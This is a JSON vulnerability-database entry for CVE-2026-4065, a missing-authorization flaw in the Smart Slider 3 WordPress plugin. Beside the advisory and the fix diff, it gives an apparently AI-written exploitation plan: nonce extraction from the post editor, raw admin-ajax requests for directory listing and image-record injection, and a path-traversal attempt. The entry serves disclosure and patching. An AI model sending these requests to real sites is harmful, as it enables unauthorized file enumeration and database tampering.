[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fz9uUVA8hiYulnCN4sZWv3ogvEE8qXGJGriM_D-tIXOY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4065","smart-slider-3-missing-authorization-to-authenticated-contributor-slider-data-read-and-image-record-manipulation","Smart Slider 3 \u003C= 3.5.1.33 - Missing Authorization to Authenticated (Contributor+) Slider Data Read and Image Record Manipulation","The Smart Slider 3 plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on multiple wp_ajax_smart-slider3 controller actions in all versions up to, and including, 3.5.1.33. The display_admin_ajax() method does not call checkForCap() (which requires unfiltered_html capability), and several controller actions only validate the nonce (validateToken()) without calling validatePermission(). This makes it possible for authenticated attackers, with Contributor-level access and above, to enumerate slider metadata and create, modify, and delete image storage records by obtaining the nextend_nonce exposed on post editor pages.","smart-slider-3",null,"\u003C=3.5.1.33","3.5.1.34","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Missing Authorization","2026-04-07 08:51:34","2026-04-07 21:26:20",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F53a08b59-b7e0-419a-bfc3-528bcddb1ac2?source=api-prod",1,[22,23,24,25,26,27,28,29],"Nextend\u002FFramework\u002FAsset\u002FCss\u002FLess\u002FLessCompiler.php","Nextend\u002FFramework\u002FAsset\u002FPredefined.php","Nextend\u002FFramework\u002FBrowse\u002FControllerAjaxBrowse.php","Nextend\u002FFramework\u002FFont\u002FSources\u002FGoogleFonts\u002Ffamilies.csv","Nextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php","Nextend\u002FFramework\u002FImage\u002FImageEdit.php","Nextend\u002FLanguages\u002Fsmartslider3.pot","Nextend\u002FSmartSlider3\u002FApplication\u002FAdmin\u002FSettings\u002FViewSettingsGeneral.php","researched",false,3,"# Detailed Exploitation Research Plan: CVE-2026-4065\n\n## 1. Vulnerability Summary\nThe Smart Slider 3 plugin (up to and including 3.5.1.33) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the plugin uses a base controller `AdminAjaxController` that handles various actions via the `wp_ajax_smart-slider3` hook. While the plugin implements nonce validation (`validateToken()`), it fails to perform capability checks (`checkForCap()` or `validatePermission()`) in several sensitive controller actions. \n\nAs a result, any authenticated user with access to a page where the `nextend_nonce` is exposed (such as the WordPress post editor) can perform actions intended for administrators, including listing filesystem directories (Information Disclosure) and creating or manipulating image storage records in the database.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `smart-slider3`\n- **Vulnerable Parameters:** \n    - `nextendcontroller`: The target controller (e.g., `browse` or `image`).\n    - `nextendaction`: The target method (e.g., `index` or `addVisual`).\n    - `nextend_nonce`: The CSRF token required for validation.\n- **Authentication:** Contributor level or higher.\n- **Preconditions:** The attacker must be authenticated as a Contributor to access the post editor and retrieve the required nonce.\n\n## 3. Code Flow\n1. **Entry Point:** A request is sent to `admin-ajax.php?action=smart-slider3`.\n2. **Routing:** The plugin routes the request based on `nextendcontroller`. \n3. **Missing Check:** In `Nextend\u002FFramework\u002FBrowse\u002FControllerAjaxBrowse.php`, the `actionIndex()` method is invoked.\n    - Line 19: `$this->validateToken();` is called (verifies `nextend_nonce`).\n    - **Vulnerability:** No call to `$this->validatePermission()` or `current_user_can()` follows.\n4. **Execution (Browse):**\n    - The code calculates a path relative to `Filesystem::getImagesFolder()`.\n    - It uses `glob()` and `scandir()` to list contents.\n    - Line 95: Returns a JSON response containing the filesystem structure.\n5. **Execution (Image Manipulation):**\n    - In `Nextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php`, `actionAddVisual()` (Line 38) calls `$this->validateToken()`.\n    - It proceeds to call `$model->addVisual()` which writes to the database without verifying if the user has permission to manage slider images.\n\n## 4. Nonce Acquisition Strategy\nThe `nextend_nonce` is localized for the backend editor. \n1. **Authentication:** Log in as a Contributor user.\n2. **Access Editor:** Navigate to the new post page (`\u002Fwp-admin\u002Fpost-new.php`).\n3. **Script Trigger:** Smart Slider 3 enqueues its assets on the editor page to support the \"Smart Slider\" button in the editor toolbar.\n4. **JS Variable Extraction:** The nonce is stored within the `_N2` JavaScript object, specifically inside the `AjaxHelper` configuration.\n    - Use `browser_eval` to extract it:\n      ```javascript\n      _N2.AjaxHelper.ajaxArray['nextend_nonce']\n      ```\n    - Alternatively, it may be found in the global scope if localized via `wp_localize_script`.\n\n## 5. Exploitation Strategy\n\n### Step 1: Directory Enumeration (Read Access)\nList the contents of the WordPress uploads directory to identify sensitive files or folder structures.\n- **HTTP Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php?action=smart-slider3&nextendcontroller=browse&nextendaction=index HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    path=\u002F&nextend_nonce=[EXTRACTED_NONCE]\n    ```\n- **Expected Response:** A JSON object containing `directories` and `files` keys listing the contents of the base image folder.\n\n### Step 2: Image Record Manipulation (Write Access)\nInject a malicious or arbitrary image storage record.\n- **HTTP Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php?action=smart-slider3&nextendcontroller=image&nextendaction=addVisual HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    image=vulnerable_test_image.png&value=payload_data_here&nextend_nonce=[EXTRACTED_NONCE]\n    ```\n- **Expected Response:** A JSON object with the `visual` data, including a new `visualId`, confirming the record was created in the database.\n\n## 6. Test Data Setup\n1. Create a Contributor user: `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`.\n2. Ensure Smart Slider 3 is active.\n3. (Optional) Create at least one slider to ensure the plugin's database tables are initialized: `wp eval \"Nextend\\SmartSlider3\\Slider\\ModelSlider::create(array('title' => 'Test Slider'));\"`.\n\n## 7. Expected Results\n- The `browse\u002Findex` request should return a listing of the `wp-content\u002Fuploads` directory (or the plugin's configured image root).\n- The `image\u002FaddVisual` request should return a success status and a `visualId`, indicating that a Contributor successfully modified the image metadata store, which normally requires `unfiltered_html` or Administrator privileges.\n\n## 8. Verification Steps\nAfter performing the HTTP requests:\n1. **Check Directory Access:** Verify the JSON response from `browse\u002Findex` matches the actual filesystem.\n    - `ls -R wp-content\u002Fuploads`\n2. **Check Database Records:** Query the database to see if the visual record was inserted.\n    - `wp db query \"SELECT * FROM wp_nextend2_image_storage WHERE image = 'vulnerable_test_image.png';\"`\n    - Note: The table name prefix might vary based on the environment (usually `wp_nextend2_image_storage`).\n\n## 9. Alternative Approaches\nIf `nextendcontroller=browse` is blocked or patched differently:\n- **Delete Visuals:** Attempt to delete existing image visuals using `nextendcontroller=image&nextendaction=deleteVisual&visualId=[ID]`.\n- **Enumerate Subdirectories:** Try path traversal-like structures in the `path` parameter (e.g., `path=..\u002F..\u002F`) to see if the `realpath` check in `ControllerAjaxBrowse.php` (Line 24) can be subverted, although it appears to attempt to anchor to the root.","The Smart Slider 3 plugin lacks authorization checks on several AJAX controller actions, including directory browsing and image metadata manipulation. This allows authenticated users with Contributor-level access to enumerate files on the server and modify slider-related database records by exploiting a nonce exposed in the post editor.","\u002F\u002F Nextend\u002FFramework\u002FBrowse\u002FControllerAjaxBrowse.php:17\npublic function actionIndex() {\n    $this->validateToken();\n    $requestedPath = Request::$REQUEST->getVar('path', '');\n\n    $root = Filesystem::convertToRealDirectorySeparator(Filesystem::getImagesFolder());\n\n---\n\n\u002F\u002F Nextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php:37\npublic function actionAddVisual() {\n    $this->validateToken();\n\n    $image = Request::$REQUEST->getVar('image');\n    $this->validateVariable(!empty($image), 'image');\n\n    $model = $this->getModel();\n\n    if (($visual = $model->addVisual($image, Request::$REQUEST->getVar('value')))) {\n---\n\n\u002F\u002F Nextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php:54\npublic function actionDeleteVisual() {\n    $this->validateToken();\n\n    $visualId = Request::$REQUEST->getInt('visualId');","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsmart-slider-3\u002F3.5.1.32\u002FNextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsmart-slider-3\u002F3.5.1.34\u002FNextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsmart-slider-3\u002F3.5.1.32\u002FNextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php\t2021-06-10 11:12:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsmart-slider-3\u002F3.5.1.34\u002FNextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php\t2026-03-24 07:41:32.000000000 +0000\n@@ -36,6 +36,7 @@\n \n     public function actionAddVisual() {\n         $this->validateToken();\n+        $this->validatePermission('smartslider_edit');\n \n         $image = Request::$REQUEST->getVar('image');\n         $this->validateVariable(!empty($image), 'image');\n@@ -54,6 +55,7 @@\n \n     public function actionDeleteVisual() {\n         $this->validateToken();\n+        $this->validatePermission('smartslider_delete');\n \n         $visualId = Request::$REQUEST->getInt('visualId');\n         $this->validateVariable($visualId > 0, 'image');\n@@ -72,6 +74,7 @@\n \n     public function actionChangeVisual() {\n         $this->validateToken();\n+        $this->validatePermission('smartslider_edit');\n \n         $visualId = Request::$REQUEST->getInt('visualId');\n         $this->validateVariable($visualId > 0, 'image');","1. Authenticate to the WordPress site as a Contributor or higher.\n2. Access the WordPress post editor (e.g., `\u002Fwp-admin\u002Fpost-new.php`) and extract the `nextend_nonce` from the `_N2` global JavaScript object (specifically within `_N2.AjaxHelper.ajaxArray`).\n3. To enumerate directories: Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php?action=smart-slider3&nextendcontroller=browse&nextendaction=index` with parameters `path=\u002F` and the stolen `nextend_nonce`. The response will contain a directory and file listing for the uploads directory.\n4. To manipulate image records: Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php?action=smart-slider3&nextendcontroller=image&nextendaction=addVisual` with the stolen `nextend_nonce`, an `image` name, and a `value` containing arbitrary metadata. This injects a record into the image storage database table.","gemini-3-flash-preview","2026-04-17 20:58:23","2026-04-17 20:58:52",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.5.1.32","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmart-slider-3\u002Ftags\u002F3.5.1.32","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsmart-slider-3.3.5.1.32.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmart-slider-3\u002Ftags\u002F3.5.1.34","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsmart-slider-3.3.5.1.34.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmart-slider-3\u002Ftags"]